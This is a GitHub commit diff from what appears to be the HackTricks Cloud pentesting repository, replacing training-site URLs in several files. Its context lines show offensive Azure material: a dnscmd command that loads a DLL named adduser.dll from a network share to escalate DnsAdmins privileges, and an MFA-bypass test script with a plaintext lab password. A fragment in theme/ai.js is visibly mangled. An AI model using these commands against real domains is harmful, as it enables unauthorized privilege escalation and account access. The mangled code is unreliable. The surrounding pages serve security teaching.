Skip to content

Commit 745851f

Browse files
committed
f ht url
1 parent d319c52 commit 745851f

File tree

6 files changed

+10
-10
lines changed

6 files changed

+10
-10
lines changed

.github/pull_request_template.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ You can remove this content before sending the PR:
44
We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or that have permission to share it from the original author (adding a reference to the author in the added text or at the end of the page you are modifying or both). Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
55

66
## HackTricks Training
7-
If you are adding so you can pass the in the [ARTE certification](https://training.hacktricks.xyz/courses/arte) exam with 2 flags instead of 3, you need to call the PR `arte-<username>`.
7+
If you are sending a PR so you can pass the in the [ARTE certification](https://hacktricks-training.com/courses/arte) exam with 2 flags instead of 3, you need to call the PR `arte-<username>`, `grte-<username>` or `azrte-<username>`, depending on the certification you are doing.
88

99
Also, remember that grammar/syntax fixes won't be accepted for the exam flag reduction.
1010

src/banners/hacktricks-training.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
> [!TIP]
2-
> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
3-
> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
4-
> Learn & practice Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
2+
> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
3+
> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
4+
> Learn & practice Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
55
>
66
> <details>
77
>

src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -25,7 +25,7 @@ Members of the generated **`AAD DC Administrators`** group are granted local adm
2525
- **`DnsAdmins`**: This group allows to manage the DNS settings and was abused in the past to [escalate privileges and compromise the domain](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html?highlight=dnsadmin#dnsadmins), however after testing the attack in this environment it was checked that the vulnerability is patched:
2626

2727
```text
28-
dnscmd TDW52Y80ZE26M1K.azure.training.hacktricks.xyz /config /serverlevelplugindll \\10.1.0.6\c$\Windows\Temp\adduser.dll
28+
dnscmd TDW52Y80ZE26M1K.azure.hacktricks-training.com /config /serverlevelplugindll \\10.1.0.6\c$\Windows\Temp\adduser.dll
2929
3030
DNS Server failed to reset registry property.
3131
Status = 5 (0x00000005)
@@ -62,7 +62,7 @@ az rest --method post \
6262
# Get domain configuration
6363
az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/<domain-name>?api-version=2022-12-01&healthdata=true"
6464
## e.g.
65-
az rest --url "https://management.azure.com/subscriptions/0ce1297c-9153-425d-3229-f51093614377/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/azure.training.hacktricks.xyz?api-version=2022-12-01&healthdata=true"
65+
az rest --url "https://management.azure.com/subscriptions/0ce1297c-9153-425d-3229-f51093614377/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/azure.hacktricks-training.com?api-version=2022-12-01&healthdata=true"
6666

6767
# Based on the VNet assigned to the domain services, you can enumerate the VMs in the domain
6868

src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -164,7 +164,7 @@ Donkey token is a set of functions which aim to help security consultants who ne
164164
**Test each portal** if it's possible to **login without MFA**:
165165

166166
```bash
167-
$username = "conditional-access-app-user@azure.training.hacktricks.xyz"
167+
$username = "conditional-access-app-user@azure.hacktricks-training.com"
168168
$password = ConvertTo-SecureString "Poehurgi78633" -AsPlainText -Force
169169
$cred = New-Object System.Management.Automation.PSCredential($username, $password)
170170
Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue

theme/ai.js

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@
1414
* ❶ Markdown rendering + sanitised (same as before)
1515
* ❷ ENHANCED: improved drag‑to‑resize panel with better UXdiscount.jpeg';
1616
const TXT = 'Click here for HT Summer Discounts, Last Days!';
17-
const URL = 'https://training.hacktricks.xyz';
17+
const URL = 'https://hacktricks-training.com';
1818
1919
// Stop if user already dismissed
2020
if (localStorage.getItem(KEY) === 'true') return;

theme/index.hbs

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -151,7 +151,7 @@
151151

152152
<div class="right-buttons">
153153
<div id="menubar-collapse">
154-
<a class="menu-bar-link" href="https://training.hacktricks.xyz" target="_blank">
154+
<a class="menu-bar-link" href="https://hacktricks-training.com" target="_blank">
155155
HT Training
156156
</a>
157157
<a class="menu-bar-link" href="https://book.hacktricks.wiki/" target="_blank">
@@ -174,7 +174,7 @@
174174
<div id="menubar-collapse-toggle" class="icon-button" type="button" title="Toggle menu bar" aria-label="Toggle Menu bar" aria-expanded="false" aria-controls="collapse">
175175
<span class="menu-hamburger" aria-hidden="true">≡</span>
176176
<div id="menubar-collapse-popup" class="menubar-collapse-popup" aria-label="Menu" role="menu">
177-
<a href="https://training.hacktricks.xyz" target="_blank" role="menuitem" class="menu-bar-link">HT Training</a>
177+
<a href="https://hacktricks-training.com" target="_blank" role="menuitem" class="menu-bar-link">HT Training</a>
178178
<a href="https://book.hacktricks.wiki/" target="_blank" role="menuitem" class="menu-bar-link">Book HT</a>
179179
<a href="https://tools.hacktricks.wiki/" target="_blank" role="menuitem" class="menu-bar-link">HT Tools</a>
180180
<a href="https://github.com/sponsors/carlospolop" target="_blank" role="menuitem" class="menu-bar-link">Sponsor</a>

0 commit comments

Comments
 (0)